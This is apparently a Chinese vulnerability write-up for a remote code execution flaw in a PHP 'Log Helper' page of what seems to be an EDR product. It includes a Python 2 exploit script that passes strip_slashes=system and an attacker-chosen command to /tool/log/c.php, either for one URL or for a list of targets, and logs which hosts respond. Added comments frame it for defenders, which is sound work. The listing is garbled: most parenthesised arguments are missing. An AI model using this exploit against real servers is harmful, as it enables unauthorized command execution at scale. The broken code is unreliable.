RCE
// Excerpt from the affected page handler: prints a heading, then references the
// $show_form closure defined below. Parenthesised argument lists were dropped from
// this listing, so the call arguments are not visible here.
echo "<p><b>Log Helper</b></p>"; $show_form;
跟入show_form
/**
* Display the form.
* @param array $params request parameters
* @return
*/
$show_form = function use {
// NOTE(review): the argument lists of extract, isset and the $strip_slashes
// expression were dropped from this listing, so only the shape of the code is
// visible. extract presumably imports request variables into local scope —
// confirm against the original source.
extract;
// $host falls back to "127.0.0.1" when the parameter is absent; the query string
// used by the script further down (strip_slashes=system) indicates $strip_slashes
// is invoked as a function name. A callable name derived from request input is
// the defect here: the fix is a fixed function or an allow-list check, never a
// caller-chosen name.
$host = isset ? $strip_slashes : "127.0.0.1";
exp:
# -*- coding: utf-8 -*-
# @Time : 2020/8/17
# @Author : Angel
# @File : edr.py
# 感谢大佬提供Command execute部分代码
import requests
import re
import urllib3
import sys
# Silences urllib3 warnings. The argument was dropped from this listing;
# presumably InsecureRequestWarning, which fits a request made with certificate
# verification disabled — confirm.
urllib3.disable_warnings
# Prints the usage banner, one line per print. The banner text was dropped from
# this listing together with every other parenthesised argument.
def hello:
print
print
print
print
print
print
print
print
# Reads a text file line by line into a list (one entry per stripped line) and
# returns it. The open() arguments, the loop condition and the append argument
# were dropped from this listing.
def readFile:
# NOTE(review): `list` shadows the builtin, and the handle is closed by hand
# rather than with a `with` block, so an exception while reading leaks it.
list=[]
keywords = open
line = keywords.readline.strip
while :
list.append
line = keywords.readline.strip
keywords.close
return list
# Appends one line to the file named `file` + ".txt" (opened in "a+" mode).
# Parameter names were dropped from this listing; `file` is presumably a
# parameter, not the Python 2 builtin — confirm.
def log:
# NOTE(review): the write looks like it lost a backslash in extraction ("\n"
# shown as "n"); the handle is closed manually with no try/finally and no
# explicit encoding.
save = file+".txt", "a+")
save.write+"n")
save.close
# Sends one GET request to <base>/tool/log/c.php and reports "+" when the request
# and response handling succeed, "-" on any exception. The two .format()
# arguments were dropped from this listing (presumably the base URL and the
# command read by the caller — confirm).
def rce:
# Fixed browser-like request headers; nothing here varies per call.
headers={
'Connection': 'close',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 AppleWebKit/537.36 Chrome/84.0.4147.125 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Sec-Fetch-Site': 'none',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-User': '?1',
'Sec-Fetch-Dest': 'document',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9'
}
# Detection note for defenders: the request shape — a GET to /tool/log/c.php
# whose query string sets strip_slashes=system together with a host parameter —
# is what a web-server log search, WAF or IDS rule for this issue should match.
url="{}/tool/log/c.php?strip_slashes=system&host={}".format
print url
try:
# The GET keyword arguments (headers, timeout, TLS verification) are not
# visible in this listing.
response = requests.get
response.raise_for_status
response.encoding = "utf-8"
#print response.text
# The regex literal was partially dropped; what remains shows it extracting the
# text between the <pre> and <form> tags of the response body.
res=re.findall<pre><form',response.text,re.S)
response.close
print
return "+"
# NOTE(review): the bare except swallows every exception — including
# KeyboardInterrupt and any bug in the try body — and reports it as a plain "-".
# requests.RequestException is the narrow form.
except:
print
return "-"
# Entry point. Python 2 syntax throughout (raw_input, print statement), so this
# does not run unmodified on Python 3. Argument lists and the len() operands were
# dropped from this listing. Branches: no argument -> usage banner; "url" ->
# interactive loop reading commands from stdin; "file" -> one rce() call per line
# of the list file, recording each result through log() (the file names passed
# to log() are not visible here).
if __name__ == '__main__':
if len < 2:
hello
else:
if sys.argv[1] == "url":
# NOTE(review): the loop has no exit condition other than an interrupt; an
# empty input line only prints a message and resets `command`.
while 1:
command = raw_input
if command:
print
rce
else:
print
command = ""
elif sys.argv[1] == "file":
if < 3:
print "Command: python edr.py file url.txt"
else:
# The loop variable is unused except as the rce()/log() argument, and the
# readFile() argument (presumably sys.argv[2]) is not visible here.
for i in readFile:
print
if rce == "+":
log
else:
log
else:
hello
参考链接:
https://www.cnblogs.com/potatsoSec/p/13520546.html






